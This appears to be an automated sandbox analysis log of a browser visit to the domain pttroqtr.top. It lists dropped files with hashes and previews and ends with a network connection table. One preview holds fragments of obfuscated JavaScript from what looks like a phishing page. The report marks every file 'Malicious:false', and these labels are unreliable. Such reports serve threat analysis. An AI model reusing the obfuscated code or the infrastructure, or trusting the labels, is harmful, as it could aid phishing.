                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (17840), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):17840
                                                                                                                                                                                            Entropy (8bit):5.05052143987542
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:w58y3F4D2arxp2CygGCL1dylCL1J1i5iONdb9dJNdsoyVjU3kagh+hsr/2g1w:wV3F4K2xwbzWVjYXgchsDE
                                                                                                                                                                                            MD5:D0005C8D31546500BA92FED4EBA66850
                                                                                                                                                                                            SHA1:51290A4147664F5968BC24476181E92C27DABF70
                                                                                                                                                                                            SHA-256:925325FAAC0525494FFAA66AC114EDE355FDF6C2715B9C71D0176EA861A98294
                                                                                                                                                                                            SHA-512:8E7F6734C2ABC891FDA41FD3A6B6C1DFADCC932F93853C19860FC4C4B32BB546EA1319E175907D15DF65305FCD0A9B3A702B408CC99BBCF56149B23F841FB4B9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkifyHtml=function(t){"use strict";var e={amp:"&",gt:">",lt:"<",nbsp:" ",quot:'"'},i=/^#[xX]([A-Fa-f0-9]+)$/,n=/^#([0-9]+)$/,s=/^([A-Za-z0-9]+)$/,o=function(){function t(t){this.named=t}return t.prototype.parse=function(t){if(t){var e=t.match(i);return e?String.fromCharCode(parseInt(e[1],16)):(e=t.match(n))?String.fromCharCode(parseInt(e[1],10)):(e=t.match(s))?this.named[e[1]]||"&"+e[1]+";":void 0}},t}(),a=/[\t\n\f ]/,r=/[A-Za-z]/,h=/\r\n?/g;function u(t){return a.test(t)}function p(t){return r.test(t)}var c=function(){function t(t,e,i){void 0===i&&(i="precompile"),this.delegate=t,this.entityParser=e,this.mode=i,this.state="beforeData",this.line=-1,this.column=-1,this.input="",this.index=-1,this.tagNameBuffer="",this.states={beforeData:function(){var t=this.peek();if("<"!==t||this.isIgnoredEndTag()){if("precompile"===this.mode&&"\n"===t){var e=this.tagNameBuffer.toLowerCase();"pre"!==e&&"textarea"!==e||this.consume()}this.transitionTo("dat
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):16498
                                                                                                                                                                                            Entropy (8bit):7.8582701910541655
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:9ogvnYzo4hpswgtGt8n9o4KsbPHRT8DGCkj21VEwU:DnSxrsLtGt54trHx8D3U
                                                                                                                                                                                            MD5:9A038EA93F4919E25D2064BA48874586
                                                                                                                                                                                            SHA1:4996E14DCB1BA05CD29D19C45DFAABA45AA3BCC2
                                                                                                                                                                                            SHA-256:49FE57608D794F7B7F923847B653CCEC67C5C2083906CB5780ECD7B8F22BFD16
                                                                                                                                                                                            SHA-512:6A9918EA7AE0DEDBAA1E9D0FC7D41274FEE90C9D29A5254D4F33C4BF87827425CA0B4CDAB76C62AE79A9AB4CB28AA9857E4F4A72CD5612DA45565630CA3AE5E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx.......]..G..e#{W...N.vDR!..]a...cG!.]*G4.|..;"..~\..@...4.;..:N."......A.;'...#..r.G..4..1.8...'..v.%...{...........g...:.....~>.....c...P,7q.....q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ....<2_.^......q(.=.lt./u/.U8....X....p.`.......k.{-k..4.P>.Q.r...C..G.My.u..|.3..!.........u...^M/.mqt&2.I..|....jK..^...^Hj.p\.......+....6..5.6g;@..t.9..........P7...lz5.....y..".x.%. ..qo..).lw)f0.Pc...0.!.dz.!3c.......w..q...l.....l..C.....n%.&$.......q
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):27613
                                                                                                                                                                                            Entropy (8bit):7.9067114058135255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:mP841dvgbsFJpwSBB0mFot1XFEUmf0Hl+009q+v+k60IOfsewcKQTaY1:mU41OQFJpZfot1+Umf08j+ROkeEK1
                                                                                                                                                                                            MD5:42783A8A7A54514AC07F633D0828C7A2
                                                                                                                                                                                            SHA1:2E6C33B957D0425C21EDE292563336688557BCC2
                                                                                                                                                                                            SHA-256:5EC2E2250A6985E5E16C04978FAD8783F0B58D4DC73D9E19E70A7B59CE8CFD77
                                                                                                                                                                                            SHA-512:8DC87B91FAE087E7716EE6E4685A6507AA66802E9B1CFE1874A20D0C5537F9B28D6DEE84572EF5A3592EA0E7B8C93A3E122445C15ABF593481D36C94587C1CEA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..kjIDATx...Mv.K.p..y.....5.[.)...G`<......x..#0...#pi.F.e..F.\...A*.......K6...*.........9....8-.B......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@......8....@............$...........$......8....$......8....@......8....@...........@............$......8....$......8....@......8....@...........@............$......C......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@...r../...........5.....8......z|...c.(k.yMO...n.5.`[......w....-..H..@uA...`..S....p]G.~.....F..[.5...D."..T.'V..us....wK... q...M.J.h.......,..x...H^..:.....I.m....J...[..2.>j..?..w.>&... q.....O.>..T_'..!....E[......J.EL...3.ysY.5oe.6"q.X.>b...........$..NA.n...D`l.M~.+g.6.&B.%.(YI...H.f.5g;..~a...~........ q..E........{.z\.".yB.v.G.j...2"...5..h.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):112550
                                                                                                                                                                                            Entropy (8bit):5.311884237132668
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:P/OLp3mvR71BPJJipknKTfLswZA4u1ZHA0Yr+4UuKcOHUPHbbcAnK:P/OLNmvR71BPJJip1TfYwZA4u1ZHA0EA
                                                                                                                                                                                            MD5:9D404836256B5CCA87EC2DD4E6C5B851
                                                                                                                                                                                            SHA1:2E8C690AD11ADC6A062B6275508D9DE3DE50E96F
                                                                                                                                                                                            SHA-256:0A692D8595918A8DE18443C98340B61F39B25C3F66C53C28BED94FF18B7E6EC0
                                                                                                                                                                                            SHA-512:BB9E2EAA4C4FCC6274E0BB0EBC76318EDB828184C0172C98B1DEB049D6E8862F28DD26B4AFAA4ADAF4C7C4D0CFBC7FA1D610C2ACBD3D598F3025ACF91B775D13
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x4ad14f(0x291))/0x4)+parseInt(_0x4ad14f(0x150))/0x5+parseInt(_0x4ad14f(0x2d1))/0x6+-parseInt(_0x4ad14f(0x2a6))/0x7+-parseInt(_0x4ad14f(0x13a))/0x8+parseInt(_0x4ad14f(0x1d0))/0x9;if(_0x23aed6===_0x4bd1ef)break;else _0x4f09df['push'](_0x4f09df['shift']());}catch(_0x753273){_0x4f09df['push'](_0x4f09df['shift']());}}}(a1_0x1319,0x6eb50));const a1_0x243f17=(function(){let _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};return _0x2d03c3=![],_0x3d297c;};}()),a1_0x454d09=a1_0x243f17(this,function(){const _0x52e53d=a1_0x1a33;return a1_0x454d09[_0x52e53d(0x1c2)]
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjbam&sid=xZsOXWwlpa9sZhJdAEf0
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):62332
                                                                                                                                                                                            Entropy (8bit):7.984048376361694
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:XF1K4X0e45gJhahETAI55341LAa/ny5pqkQJJoGWkr/gk6kV1i+y4:XZ0b5gy+P41sM/Xok6xL4
                                                                                                                                                                                            MD5:3E2AC9A8F2274B97550C20946E9E6AA7
                                                                                                                                                                                            SHA1:5748E42EF801F5682C683CF990053C880993FAF3
                                                                                                                                                                                            SHA-256:661C5384CC0FC72BBE7D9D938A618369DD63E2B926EEC03D2518BA2A27F83773
                                                                                                                                                                                            SHA-512:FBCF9108314BE3A9FB61E2D82F3E8201B31B042BEBE637F2250F58D69770B5FF9FC197EC260726189F119F0C6964F39726C1F340C50087C3B2D69DEFDE79AFE7
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}..[...Q.VZi{.^.{..Wl... .'$!...~.GBI.K..._.!................Wu.3wF.+.z.^m....#k5...j..wN...A .....@ .[.R......@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....H..@ .....H..@ .....H..@ .....H..@ .....8..@ .....8..@ .....8..@ ..."q...@ ..."q...@ ..."q...@ ..D.....@ ..D.....@ ..D.....@ ........@ ........@ ........@ ........@ ..#.....@ ..#.....@ ..#.....@ .G .....@ .G .....@ .G .....@$.@ .....@$.@ .....@$.@ .....@$.@ .............ao..Q#.&. {..{..r.......@.9h.AZ{.!.....K'>..K......../..02...$....a.A.T..@ ...c...;..2.jUD^.I.A...=(.,....>q...<.3o'm..@ ..D...'pZ.Q.C./R.jC.gT}m..4. ..1.........$
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1798)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1857
                                                                                                                                                                                            Entropy (8bit):5.4512281174258765
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:fbjT4XvxAU7+rbdqI152lNGqS6aLeV6L5cmMY8MDgWLMR6wZ4b7ZylJeBgqwmXId:fbAfxADbA2eV6WJYPDOEw2fQUJO
                                                                                                                                                                                            MD5:F7E305DB554FB297C2B9CA10143123D9
                                                                                                                                                                                            SHA1:2CBB34D49DA602130B3157E4A60706500E96DF4B
                                                                                                                                                                                            SHA-256:E5030F6870EAAC3E3B54D88017D74E870CE04EB42F47D0C883CA2099E8932C35
                                                                                                                                                                                            SHA-512:5B79BFB406626FD17CA43952B5BCD6D0C92266B00662C25D68C6EDF4C8275F1A134F1F9899EF4792F094A7CA97B3B7DC828E67997EC94F65A4A28CA69D984468
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3352],{4007:function(e,n,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/doviz-kurlari",function(){return r(7170)}])},7170:function(e,n,r){"use strict";r.r(n),r.d(n,{__N_SSP:function(){return x}});var s=r(3288),c=(r(2466),r(3475)),i=r.n(c),t=r(8082),l=r(3395),d=r(3230),u=r(4926),a=r.n(u),h=r(1395),_=(r(8966),r(4087)),o=new(r.n(_)());o.set("currencies",null),o.set("currencies_time",null);var x=!0;n.default=function(e){var n=e.currencies,r=(0,t.Z)("GetLanguageResourceResponse").t;return(0,h.useRouter)(),(0,s.jsxs)(s.Fragment,{children:[(0,s.jsx)(a(),{children:(0,s.jsxs)("title",{children:[r(l.My.TITLE)," | ",r(l.My.EXCHANGE_RATE)]})}),(0,s.jsxs)("div",{className:i().container,children:[(0,s.jsx)("div",{className:i().header,children:(0,s.jsx)("h1",{children:r(l.My.EXCHANGE_RATE)})}),n&&(0,s.jsxs)("table",{className:i().table,children:[(0,s.jsx)("thead",{children:(0,s.jsxs)("tr",{children:[(0,s.jsx)("th",{children:r(l.My.CURRENCY_CO
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                            Entropy (8bit):4.440074751043314
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                            MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                            SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                            SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                            SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):21895
                                                                                                                                                                                            Entropy (8bit):7.839028487142548
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:jPqsTPPq3PPqFPPqa/743sZpR/J3xMIqn3BU54X0q6+I9jstD/zS/VN/bAqkpAko:jPqsTPPq3PPqFPPqaD43sZD/Na53B8Ca
                                                                                                                                                                                            MD5:2521C5CB66A4D396A16637DC0B4AC309
                                                                                                                                                                                            SHA1:B96042B472F4C9386F739A69E52CA5D68DE760D7
                                                                                                                                                                                            SHA-256:BB65C7B6550153A9CE4BB0D9B5EF308F500CF188F465F68DE7B83D1A0E7B55DA
                                                                                                                                                                                            SHA-512:92D6FB984323E46AB0157F445187A6B14413D32408562B362C809C7770AF301F5F77A39FA9466C0B1D5B55BE9DADE5231402D6A0128398A650F406CB0CE46329
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/52.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..U.IDATx..O.#I...3.....^..".E..B.....U....rK...Reo.v.-.\......$.w7.a.X.k..H....k..w3.V,@.O.......v.N..#.......'~q...|......`..."....@......"......q.....8....@......"............8....@..... .............8....@..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D....."......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@.....7~...>.........t!..@......0^...,.\B
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):15215
                                                                                                                                                                                            Entropy (8bit):7.966328191753387
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
                                                                                                                                                                                            MD5:7BB31B9EF5F35D816F9BC7A816C800D7
                                                                                                                                                                                            SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
                                                                                                                                                                                            SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
                                                                                                                                                                                            SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/favicon.ico
                                                                                                                                                                                            Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):10360
                                                                                                                                                                                            Entropy (8bit):7.772743411893453
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:nIT6oZvIiGiCBjFDsnk/7vzukL1f3hBXF8h6UaM:nrodrGiGwnkTvKQ13W0Ux
                                                                                                                                                                                            MD5:C7D382ABD20C03688E3C72F9AB09E535
                                                                                                                                                                                            SHA1:D290EE4A0D10EBD46208206CB44C69C72C8DF2B5
                                                                                                                                                                                            SHA-256:9DEC48B0372F2CB164F2FEBD05E909A1C7B49C1BE12E1A143BA7FBD43435EE6A
                                                                                                                                                                                            SHA-512:997AD2487E21001921490F84979FFB4096F885DF5C938CB083C74E65B1316A98D02DB689C37E3FB1CC0A6DFED32432B7E6341DEEB3C98F9AA80532E59EC87BA6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/35.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..(.IDATx...Mz.X.7`....+ ..............R+.....0...V....JVPf..+..C.u.\...#[....|.].G..s~:.....^..0,.....!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!.|..'..k.L..C.......M..\.q.x.?...3.G7.o.q]..hG.P.O.x}...l..b...sq..8..-\..<.'...y..tqL_..p.uv]n......:.J.;...IV.G.....bq#\:3..p..?^......<(5..t..5.s.EpZ.O..w-..[..UO..|..E.
                                                                                                                                                                                            No static file info
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Sep 28, 2024 05:39:09.512598991 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:09.606307030 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:09.684436083 CEST49673443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:19.047693968 CEST4970980192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:19.048621893 CEST4971080192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:19.052844048 CEST80497098.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:19.052946091 CEST4970980192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:19.053765059 CEST80497108.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:19.054044008 CEST4970980192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:19.054104090 CEST4971080192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:19.058969975 CEST80497098.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:19.128942013 CEST49675443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:19.294996023 CEST49673443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:19.392664909 CEST49674443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:19.648962975 CEST80497098.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:19.701450109 CEST4970980192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.299313068 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.299355030 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.299412966 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.300013065 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.300028086 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.908485889 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.908838987 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.908849955 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.910319090 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.910396099 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:20.924514055 CEST4434970323.1.237.91192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:20.924614906 CEST49703443192.168.2.523.1.237.91
                                                                                                                                                                                            Sep 28, 2024 05:39:21.088160038 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.088330030 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.088340044 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.088442087 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.138286114 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.138298035 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.186232090 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.228128910 CEST49714443192.168.2.5142.250.185.132
                                                                                                                                                                                            Sep 28, 2024 05:39:21.228164911 CEST44349714142.250.185.132192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.230243921 CEST49714443192.168.2.5142.250.185.132
                                                                                                                                                                                            Sep 28, 2024 05:39:21.230765104 CEST49714443192.168.2.5142.250.185.132
                                                                                                                                                                                            Sep 28, 2024 05:39:21.230783939 CEST44349714142.250.185.132192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.280234098 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.280438900 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.280965090 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.282504082 CEST49713443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.282522917 CEST443497138.211.203.165192.168.2.5
                                                                                                                                                                                            Sep 28, 2024 05:39:21.288120985 CEST49715443192.168.2.58.211.203.165
                                                                                                                                                                                            Sep 28, 2024 05:39:21.288157940 CEST443497158.211.203.165192.168.2.5
